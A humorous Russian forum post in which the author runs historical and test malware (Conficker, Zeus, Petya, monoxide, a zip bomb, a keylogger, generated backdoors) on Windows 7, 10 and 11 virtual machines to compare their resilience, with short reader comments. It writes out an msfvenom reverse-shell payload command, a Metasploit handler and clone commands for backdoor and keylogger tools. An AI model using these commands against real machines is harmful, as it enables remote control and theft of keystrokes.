![]() |
А, ой. Вы уже здесь? Приветики. Что-то я не в настроении, но да ладно. Захотелось организовать продолжение того самого формата, в котором мы будем уничтожать различные шинудоусы всяким вредоносным ПО, а после и определять какая из этих систем надежней, безопасней и выносливей. В прошлом выпуске мы сравнивали новую 11-ю и, уже старенькую, её младшую сестрицу 10-тку. Сразу предупрежу, что это плюс-минус юморной и разговорный формат, главной целью которого есть донести результаты сравнения и поднять вам настроение.
Обе показали себя очень достойно, но в конце произошло то, чего я не ожидал, более поздняя и стабильная версия оказалась слабее по безопасности и выносливости, в итоге просто умерла с красным экраном, если вам интересно, то можете ознакомиться с результатами и самой работой здесь: Итак, сегодня сравнениям… Стоп. Прежде чем начнем нужно в обязательном порядке уронить вот это сюда: Дисклеймер На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект — это знания.И напоминаю, что в рамках этой связки статей у нас действует конкурс на 5.555 рублей, а связан он с отсылками в моих работах: культовые фильмы, анимешки да и просто мемы с играми. Узнали? Пишите комментарий, ведь тот, кто раздает все пасхалки - получит денежку. Магическая битва: последний Виндоус - противостояние: Windows 11 vs Win 7&10 или как безымянный вирус положил всех на лопатки А теперь можем начинать, сегодня я решил подойти к уничтожению более продумано. Безусловно, качая из интернета всякую пакость, систему можно убить, это даже весело, но теперь становимся серьезными, запускать будем всякие вредоносы, имеющие исторический бэкграунд и популярные. Список я ещё не составил, но оставлю его ниже с подробным пояснением о свойствах, особенностях и так далее.А сейчас о правилах по которым будет проходить наше магическое состязание, кстати сравниваем сегодня целых три системы: седьмой виндовс ( мой фаворит, хотя мне кажется умрет он первым), десятый и одиннадцатый ( зло во плоти, переустановка которого занимает два часа). Пунктики:
Среди именитых выберем следующие:
https://forum.antichat.xyz/attachmen...831312b2b1.png Короче врубайте фонк и погнали. Таков вот он у нас, порядок разрушения, но сперва давайте проверим только установленную Семерку с помощью сканера уязвимостей, до боли интересно, что из этого выйдет. К сожалению, это не самая новая версия, посему может и будут какие-то критические дыры, поехали: Код: Код:
systemctl start nessusd.serviceКод: Код:
search ms11-030Код: Код:
use 0Раз уж начали издеваться над семеркой, то давайте качать Торрент, Медиагет и Майнкрафт, если последний это лишь шутка, то первые два могут считаться полноценными майнерами, по крайней мере так я их определяю. Заодно проверим той же полезной нагрузкой, что и в прошлом выпуске получение реверс шелла: Код: Код:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.42.129 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/codeby.exeКод: Код:
use exploit/multi/handlerТак как у меня из-за 11-й винды новый Кали, придется установить все заново: Код: Код:
git clone https://github.com/Screetsec/TheFatRathttps://forum.antichat.xyz/attachmen...90528b0284.png Параллельно наш генератор бэкдоров уже установлен, давайте смотреть, что здесь есть такого интересного. Подробно расписывать не стану, ибо займет слишком много времени, потому просто скажу, что выбрал из каждого пункта по одному бэкдору, все они используют примитивные полезные нагрузки и впоследствии все они были успешно запущены. Закрывать их сессии мы не будем. Теперь установим кейлоггер Саинт, который уже когда-то фигурировал в моих статьях, единственным его нюансом есть то, что он требует установленную Джаву. Не просто так же я качал Майнкрафт, он автоматически ведь устанавливает все необходимые пакеты: Код: Код:
git clone https://github.com/tiagorlampert/sAINT.gitЗакинем готовый файлик на нашу машину и.. Запустился без каких-либо упреков и намеков, что что-то не так. 89 процессов, процессор грузится в фоновом режиме на 70%, м-м-м.. Окей, давайте попытаемся организовать работу Конфигера, первого в нашем списке. После запуска ничего не произошло, но да, он работает. В списке процессов он есть, но ничего не происходит, давайте попытаемся перейти в гугл и.. DNS был не найден. Ожидаемо, вирус работает, теперь запустим архив смерти - 42.zip. Хром блокирует загрузку данного архива, ибо считает его потенциально опасным, но нам плевать, откроем его. Результат достаточно ожидаемый, ничего особо не произошло, но вот устройство начало дико тупить, процессор загружен на 100% и в итоге виндоус перезапускается. А и у нас закончилось место на диске. Окей, а теперь картинка на один миллион пикселей, откроем её через пейнт, теперь это стандартное приложение занимает 5.5 гигабайт оперативной памяти. Неплохо, но ничего такого не произошло, хотя было бы памяти меньше, это скорее всего вызвало бы перезагрузку. Zeus открылся без особых проблем и начал свою работу в скрытом виде. А теперь самая веселая часть, начинаем запуски всякой всячины, которая вызывает глитчи и скримеры, первый в списке у нас monoxide.exe. Этот вредонос не имеет за собой кого-либо исторического бэкграунда и является, как и Миссис Мажор, исключительно программным обеспечением для тестов и не более. Рассматривать особо его не будем, давайте просто запустим и поглядим что станет с нашей виртуалкой на семерке. Кстати появился-то он не так и давно, 1-го апреля 2022 года. При попытке скачать архив, его блокирует лишь Хром, который обмануть - легче легкого. Ну-с, открываем, приложу запись экрана, чтобы вы могли понимать насколько это прикольный вирусняк. Ну как вы видите, он не блокировал сочетание ctrl+alt+del, потому я вижу возможным переключаться между пользователями и попытаться реанимировать машину, но после вынужденной перезагрузки, все, что мы можем видеть - это вот этот мерцающий цветной экран. Также вирус не давал воспользоваться диспетчером напрямую и издавал звуки, которые просто взрывают перепонки. Так как системе даем лишь один шанс, то на этом мучения семерки окончены. Здесь приведу небольшие итоги тестов на Виндовс 10:
Видеоотчет о Виндоус 10: Сразу же после запуска проходит несколько минут и машина перезагружается, далее мы видим окошко шифрования, а после открывается вот этот черепок с требованием выкупа. И здесь уже никакой диспетчер задач не поможет. Дело все в том, что коды он генерирует в зависимости от модели жесткого диска, непосредственно взаимодействуя именно с ним, а не системой. Но благо есть сайтец, который позволяет вбить модель вашего диска и прочую информацию о нем, а после получить валидный ключик для расшифровки. Просто скажете вы? Да, гениально, отвечу я. Остальные методы основаны на физическом извлечении жесткого диска, но у нас виртуалка, потому рассматривать их не станем. Вообще существует метод просто не дать заразить вашу систему и сейчас расскажу и покажу как. Для начала давайте рассмотрим сам исполняемый файлик, сперва с помощью свойств. Ничего особого, даже версии нет, в этом плане бед рэббит преуспел больше. А теперь давайте изучим его с помощью 7zip, простым открытием как архива, здесь мы видим те самые файлики, которые мы могли бы заметить при просмотре ПЕ заголовков, но нас это сейчас интересует мало. Нам нужен конкретно rdata, давайте выкинем его на рабочий стол и посмотрим, что из себя он представляет. https://forum.antichat.xyz/attachmen...1f5a170ed1.png На первый взор может показаться, что здесь ничего дельного нет, но стоит перемотать в конец и видим три основных файла, которые инфицируются при запуске шифровальщика: shell32.dll, rundll32.dll и user32.dll. Все эти файлы можно просто удалить или поставить на них “только чтение” и Петя не сможет активироваться. Прикол. Пользуйтесь, хотя уже не актуально. Бэдребит можно обезвредить таким же способом, только ДДЛки будут слегка другими. А теперь перейдем к запуску монооксида, мне очень интересно, что станет с системой, постигнет ли её участь семерки? Айда проверим. Кстати в отличие от семерки, десятка не предупреждает, что это потенциально опасный архив. Ну, результат можете видеть на видео, здесь больше разнообразие эффектов, но итог такой же. Переходим к одиннадцатой. Аналогично подвожу итоги в виде списка:
Хотите узреть, как я вижу защитника виндоус 11? А вот: Потому переходим к гвоздю нашей программы - Моноксид. Хотя я не ожидал, что он уничтожит две предыдущих системы, ладно. Убавьте звук перед просмотром, пожалуйста, отчет о смерти Виндоус 11: Да, но даже он не справился и система таки умерла, вот такое вот, видео можете глянуть или ниже или выше, смотря куда вставлю. Итоги И вот провели мы значится очередной батл между новым Виндоусом и двумя постарше. Не сказать, что меня удивили результаты, но Моноксид явно был создан специально для убийств всех систем, он запускается даже на 95-м виндоусе без особых проблем, хотя не может похвастаться таким обилием эффектов.Итак, результаты. По моему скромному мнению, семерка оказалась из этой подборки хуже всех, к сожалению. Хотя это ожидаемо, мне почему-то за неё обиднее всего, ведь худшие результаты у как раз так у этой системы: Архивы смерти, Конфикер, Зеус и даже Бонзи Килла. Могу здесь лишь сказать, что 11-я , пусть и она мне дико не нравится, порядком защищенней своих предшественников, она не допускает запуска потенциально опасного ПО, а даже если и запускает то, то старается предупредить своего пользователя. Даже в ситуации с Монооксидом, она выдала, что это потенциально опасный файл и запускать его нежелательно. Конечно, есть желание сказать, что эта система не такая уж и плоха, но язык не поворачивается, а руки не пишут. В плане эргономики - худший, в плане защищенности - один из лучших и больше нет чего добавить. А с вами был как всегда какой-то ноунейм под ником DeathDay и его маниакальное желание разрушать, всем спасибо. Мира всем, не прощаюсь. |
лучший
|
Красавчик.
|
Прикольно.
|
Молодец
|
БРАААВЛ СТАРС ТОП.
|
Чудно.
|
Ну что за человек, какой талант и какой труд.
Respect. |
Как всегда на высоте!
|
Так легко повалить их можно моё почтение
|
| Время: 06:46 |